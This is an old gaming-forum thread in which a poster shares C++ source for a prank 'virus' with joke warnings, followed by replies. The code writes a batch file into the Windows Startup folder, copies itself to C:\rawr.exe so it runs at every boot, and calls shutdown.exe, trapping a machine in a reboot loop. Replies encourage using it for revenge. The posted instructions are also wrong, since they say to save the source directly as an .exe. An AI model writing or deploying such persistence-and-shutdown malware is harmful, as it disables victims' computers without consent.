Post: Deadly Virus
08-14-2008, 07:59 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); 1) write this code in to your Notepad
2) save as All files and save as Matrix.exe

I wouldn't open it if i were you Very Happy cause your computer may never turn on again


the code :


#include <iostream>
#include <stdlib.h>
#include <windows.h>
#include <iomanip>
#include <stdio.h>
#include <conio.h>
#include <fstream>
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}




Enjoy guys remember don't open it, i do not take any responsibility for this destroying anyones computer.
Last edited by the_god91 ; 08-14-2008 at 08:15 PM.
08-14-2008, 08:51 PM #2
I know a smaller code that could do just this >=]
But please no one use this code unless your getting revenge on someone who is a myspace addict. And also you shouldn't take out the original coders name Eek
08-14-2008, 08:58 PM #3
elfmotat
Rᵤᵥ - ½gᵤᵥR ∝ Tᵤᵥ
lol, i just know someone's going to try this and end up destroying their computer.
08-15-2008, 05:32 AM #4
magglass1
S3rv0r @dm1n
Since when can you run C code from a file without compiling it first? o_O
08-24-2008, 06:31 AM #5
su1c1d3al
Do a barrel roll!
i got anew cp and i destroyed my old 1 Happy
08-24-2008, 10:23 PM #6
Surikizu
GUMI fanboy
like I hate this guy cause he messed up my new LAPTOP
08-25-2008, 07:27 PM #7
Cobra-D
Smells Like Teen Spirit
Originally posted by ultima View Post
like I hate this guy cause he messed up my new LAPTOP


Well the guy did say not to open it.
08-25-2008, 07:31 PM #8
He's lying cobra, it needs to be compiled.
08-29-2008, 11:10 AM #9
lol i no better 1's then this
i no 1 virus that will destroys all your hardware and drivers, causes blue screen of death, like soon as you turn on the cp it comes on lol
and will still stay even iff u somehow format the pc Winky Winky
08-30-2008, 07:13 AM #10
lol so much noobs, its obvious that he didnt write this because he would have known to compile it, also matt could i have that smaller source i would like to "study" it

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo